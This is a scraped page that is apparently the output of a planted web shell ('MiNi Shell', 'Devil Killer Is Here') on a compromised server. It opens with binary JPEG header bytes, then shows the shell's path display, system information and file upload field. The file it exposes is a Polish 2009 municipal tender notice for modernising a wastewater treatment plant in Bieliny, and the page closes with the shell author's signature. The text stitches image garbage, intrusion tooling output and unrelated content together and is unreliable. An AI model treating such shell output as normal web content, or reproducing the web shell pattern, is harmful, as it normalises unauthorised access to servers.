JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090710/109647-N-2009.html

<p class="kh_header"><b>Bieliny: Uporządkowanie gospodarki wodno-ściekowej w otulinie i na terenie ŚPN - Etap IV - rozbudowa i modernizacja oczyszczalni ścieków w Bielinach</b><br>
<b>Numer ogłoszenia: 109647 - 2009; data zamieszczenia: 10.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieliny , ul. Partyzantów 17, 26-004 Bieliny, woj. świętokrzyskie, faks 041 3026107.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bieliny.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Uporządkowanie gospodarki wodno-ściekowej w otulinie i na terenie ŚPN - Etap IV - rozbudowa i modernizacja oczyszczalni ścieków w Bielinach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest rozbudowa i modernizacja oczyszczalni ścieków w Bielinach. Teren przewidziany na potrzeby modernizacji oczyszczalni ścieków jest zagospodarowany w chwili obecnej istniejącymi urządzeniami oczyszczalni ścieków wraz z niezbędną infrastrukturą. Istniejąca oczyszczalnia ścieków posiada przepustowość Qśr. =250m3/d. Teren zagospodarowany jest następującymi obiektami i infrastrukturą techniczną: budynek administracyjno-techniczny, zestaw do mechanicznego oczyszczania z kratami, pompownia główna PI, komora anoksyczna, komora napowietrzniania, osadnik wtórny, pole składowania osadu, staw stabilizacyjny, kanał ścieków surowych, kanał ścieków oczyszczonych do odbiornika, wodociąg, telekomunikacja, sterowanie, zasilanie energetyczne, oświetlenie zewnętrzne, droga wewnętrzna i chodnik, ogrodzenie terenu i oczyszczalnia z bramą wjazdową i furtką.
Modernizacja oczyszczalni ma zapewnić wysoką efektywność oczyszczania ścieków oraz wprowadzenie nowoczesnej przeróbki osadów. Przepustowość oczyszczalni ścieków wynosić będzie Q śr. dob. = 700 m3/d.
Z uwagi na fakt, iż teren pod budowę oczyszczalni jest już zagospodarowany istniejącymi obiektami oczyszczalni ścieków, która pracuje i oczyszcza ścieki dopływające kanalizacją sanitarną należy proces budowy nowych obiektów oczyszczalni oraz modernizację i likwidację obiektów istniejącej oczyszczalni ścieków przeprowadzić w następującej kolejności:
- budowa budynku technicznego,
- zainstalowanie prasy, dmuchaw, zestawu do dawkowania polielektrolitu,
- budowa zadaszonego poletka z wysuszonym osadem,
- opróżnienie i likwidacja istniejącego stawu stabilizacyjnego,
- budowa zbiorników technologicznych ECOLO-CHIEF,
- rozbiórka istniejących sieci przeznaczonych do likwidacji w obrębie prowadzonych prac budowlanych,
- wykonanie modernizacji istniejących komór oraz montaż mieszadeł,
- zmiana funkcji osadnika wtórnego na osadnik wstępny,
- budowa nowej komory pomiarowej ścieków oczyszczonych wraz z oprzyrządowaniem,
- budowa nowego punktu zlewnego ze stacją zlewczą,
- montaż zestawu do mechanicznego oczyszczania ścieków,
- wykonanie wszystkich połączeń międzyzbiornikowych, rurociągów technologicznych, kanalizacji sanitarnej, sterowania, zasilania,
- zainstalowanie pomp w osadniku wstępnym, osadnikach wtórnych, komorze napowietrzniania i stabilizacji osadu, tlenomierza w I komorze napowietrzniania,
- wykonanie nasypu oczyszczalni i prac mikroniwelacyjnych
- skierowanie strumienia ścieków na ciąg technologiczny oczyszczalni.

Przedmiot zamówienia obejmuje wykonanie:
I. Obiektów oczyszczalni:
1.	Osadnik wstępny - powstanie w wyniku modernizacji istniejącego osadnika wtórnego,
2.	Komora defosfatacji (beztlenowa) - powstanie w wyniku zmiany funkcji technologicznej obecnej komory anoksycznej,
3.	Komora anoksyczna (niedotleniona) - powstanie w wyniku zmiany funkcji obecnie pracującej komory biosorbcji,
4.	Komory osadu czynnego (napowietrzania) - 4 szt. komór osadu czynnego o średnicy d=6,60m i wysokości całkowitej h=4,18m,
5.	Osadnik wtórny - 2 szt. osadnika wtórnego d=6,60m i wysokości całkowitej h=4,18m,
6.	Komora tlenowej stabilizacji osadu - 2 szt. komory tlenowej stabilizacji osadu o średnicy d=6,60m i wysokości całkowitej h=4,18m, do której kierowany jest osad nadmierny i osad wstępny
II. Obiektów inżynieryjnych i pomocniczych:
1.	Zbiornik zlewczy ścieków dowożonych,
2.	Zestaw do mechanicznego oczyszczania ścieków z sitem ślimakowym i piaskownikiem,
3.	Zbiornik wody technologicznej,
4.	Budynek administracyjny - istniejący budynek zostanie odremontowany i zaadoptowany na nowe potrzeby infrastruktury oczyszczalni po modernizacji. W ramach remontu należy wymienić urządzenia sanitarne i armaturę na nową. Położyć na podłodze terakotę i wyflizować ściany do wysokości 1,7m. Resztę powierzchni ścian i sufitów pomalować. Do budynku zostaną wstawione nowe meble. W pokoju obsługi znajdować się będzie szafa sterownicza - układ centralnego sterowania i sygnalizacji pracy urządzeń z dostosowaniem do cyfrowego przekazu danych i z możliwością przełączania na sterowanie ręczne, zespół falowników do regulacji prędkości obrotowej dmuchaw w oparciu o pomiar tlenu oraz licznik ścieków oczyszczonych w sterowniku PLC,
5.	Budynek techniczny - projektowany budynek techniczny wyposażony zostanie w instalację wodno-kanalizacyjną, elektryczną siły i światła, odgromową, teletechniczną oraz wentylację grawitacyjną i mechaniczną. Pomieszczenia ogrzewane będą elektrycznie piecami akumulacyjnymi,
6.	Wiata składowa odwodnionego osadu,
7.	Studnia pomiarowo-kontrolna,
8.	Sieci międzyobiektowe
III. Ukształtowanie i zagospodarowanie terenu;
1.	Ukształtowanie i odwodnienie terenu oczyszczalni - zostanie poszerzony nasyp w celu wytworzenia terenu pod wiatę osadu. Teren ten należy odpowiednio zagęścić. W celu odprowadzenia wód opadowych z terenu oczyszczalni zamontowane zostaną korytka ACODRIAN, które będą odprowadzać wody opadowe do istniejącej pompowni ścieków surowych i do zbiorników ścieków dowożonych. Układ komunikacyjny na terenie oczyszczalni oraz drogę dojazdową do oczyszczalni projektuje się w nawiązaniu do istniejącej ul. Partyzantów. Drogę, odwodnienie nawierzchni drogi, chodnik, ogrodzenie należy wykonać zgodnie z projektem budowlanym,
2.	Uzbrojenie terenu - teren oczyszczalni zostanie uzbrojony siecią kanałów, rurociągów technologicznych i kabli. Zasilanie oczyszczalni będzie odbywać się z 2 niezależnych źródeł energii. Oświetlenie zewnętrzne terenu za pomocą istniejących lamp mocowanych na wysięgnikach,
3.	Zieleń ochronna - ważnym elementem zagospodarowania terenu będzie projektowana zieleń niska i wysoka, która stanowić ma naturalny filtr biologiczny w ramach ograniczenia uciążliwości oczyszczalni.

Roboty należy wykonać zgodnie z dokumentacją projektową ( załącznik nr 7 do SIWZ)                i Specyfikacją Techniczną Wykonania i Odbioru Robót  (załącznik nr 6 do SIWZ).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.11.12.00-0, 45.23.24.21-9, 45.23.30.00-9, 45.31.51.00-9, 45.30.00.00-0, 45.40.00.00-1, 45.23.13.00-8, 45.11.12.91-4, 45.31.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 100.000,00 zł (słownie złotych: sto tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału określone w art. 22 ust. 1 ustawy Pzp. 

1.1.	Spełnienie warunków udziału odnoszących się do posiadania niezbędnej wiedzy i doświadczenia,  dysponowania  osobami zdolnymi do wykonania zamówienia oraz sytuacji finansowej i ekonomicznej zostanie ocenione według poniższych zasad :

1)	udokumentowane należyte wykonanie w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 roboty budowlanej odpowiadającej swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia (z podaniem ich wartości, dat wykonania oraz odbiorców), przy czym co najmniej jedna z robót powinna dotyczyć budowy lub rozbudowy oczyszczalni ścieków (o przepustowości co najmniej 300 m3/d) wraz z robotami towarzyszącymi jak przebudowa dróg dojazdowych, urządzenie terenu, roboty elektryczne. 
2)	dysponowaniem w celu wykonania zamówienia po jednej osobie posiadającej uprawnienia do kierowania robotami budowlanymi o specjalności:
a)	konstrukcyjno-budowlanej,
b)	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
c)	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych                            i elektroenergetycznych,
d)	drogowej.

3)	ubezpieczenie Wykonawcy od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż 1.000.000 PLN.

2.	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz oświadczeń lub dokumentów potwierdzających spełnianie warunków w niniejszym postępowaniu

Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 - Wykonawca składa oświadczenia, których wzór stanowią Załącznik Nr 2 oraz Załącznik Nr 3 do niniejszej SIWZ.

1.	W celu potwierdzenia, że Wykonawca posiada uprawnienia do określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ust.1 ustawy do oferty dołączyć należy:

1)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
2)	Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego, potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
3)	Aktualne zaświadczenie oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

2.	W celu potwierdzenia spełnienia warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania osobami zdolnymi do wykonania zamówienia do oferty dołączyć należy:

1) Wykaz wykonanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania tj. przed datą publikacji ogłoszenia o zamówieniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 roboty budowlanej odpowiadającej swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia (z podaniem ich wartości, dat  wykonania oraz odbiorców), przy czym co najmniej jedna z robót powinna dotyczyć budowy lub rozbudowy oczyszczalni ścieków (o przepustowości co najmniej 300m3/d) wraz z robotami towarzyszącymi jak przebudowa dróg dojazdowych, urządzenie terenu, roboty elektryczne.			
    Do wykazu Wykonawca zobowiązany jest dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie. Wykaz należy sporządzić zgodnie ze wzorem stanowiącym Załącznik Nr 1 do niniejszej SIWZ.
2) Wykaz osób przewidzianych do kierowania robotami budowlanymi oraz dokumenty potwierdzające posiadanie uprawnień budowlanych do kierowania robotami budowlanymi przez wskazane osoby w zakresie niezbędnym do wykonania zamówienia w specjalnościach: 
1) konstrukcyjno-budowlanej, 
2) instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
3) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
4) drogowej
oraz zaświadczenia, wydane przez właściwą izbę samorządu zawodowego (Okręgową Izbę Inżynierów Budownictwa), potwierdzające wpis danej osoby na listę członków właściwej izby.
Wykaz należy sporządzić zgodnie ze wzorem stanowiącym Załącznik nr 9 do SIWZ.

3.	W celu potwierdzenia spełnienia warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia do oferty dołączyć należy:
1)	Polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż 1.000.000 PLN.
Przy składaniu ofert przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy mogą złożyć jedną wspólną polisę potwierdzającą, że wszyscy Wykonawcy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż 1.000.000 PLN..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bieliny.eobip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Bieliny, ul. Partyzantów 17, 26-004 Bieliny w godz. 7.30 - 15.30.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2009 godzina 10:00, miejsce: Gmina Bieliny z adresem i siedzibą Urzędu Gminy Bieliny ul. Partyzantów 17, 26-004 Bieliny, pokój nr 14.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com